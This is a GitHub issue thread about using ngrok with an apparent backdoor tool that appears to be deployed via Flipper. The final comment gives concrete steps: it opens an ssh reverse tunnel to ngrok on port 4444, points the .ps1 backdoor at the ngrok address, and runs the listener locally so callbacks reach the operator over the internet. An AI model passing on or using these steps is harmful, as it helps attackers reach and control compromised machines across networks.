Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

NGROK #6

Open
MarKaliGG opened this issue Nov 18, 2023 · 7 comments
Open

NGROK #6

MarKaliGG opened this issue Nov 18, 2023 · 7 comments

Comments

@MarKaliGG
Copy link

Hi, can i use tools like ngrok? How can i set ip and port?

@MarKaliGG
Copy link
Author

if i write python listen.py -i myipaddress -p portgivemengrok --flipper output name --payload execute give me some bad error. how can i use this back over the wan?

@MarKaliGG
Copy link
Author

any help? Plz sweet heart i know you are here to help me

@MarKaliGG
Copy link
Author

Im still here , pls let me know how its work

@Akanni6465
Copy link

contact ngrok support

@Drew-Alleman
Copy link
Owner

Hi,

Are you just trying to host the remote payload using ngrok, or are you also trying to use the ngrok IP to connect back to the backdoor?

Best,
Drew

@schieferzahn
Copy link

What if you want to do both?

@theGreyOnceler
Copy link

the .ps1 IP/Port needs to point to NGROK IP and whatever port you want to use.

start NGROK connection: ssh -R 4444:127.0.0.1:4444 v2@connect.ngrok-agent.com tcp

python ./listen.py --ip-address 127.0.0.1 -p 4444 -A

backdoor will look to ngrok and traffic will get forwarded to your machine.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

5 participants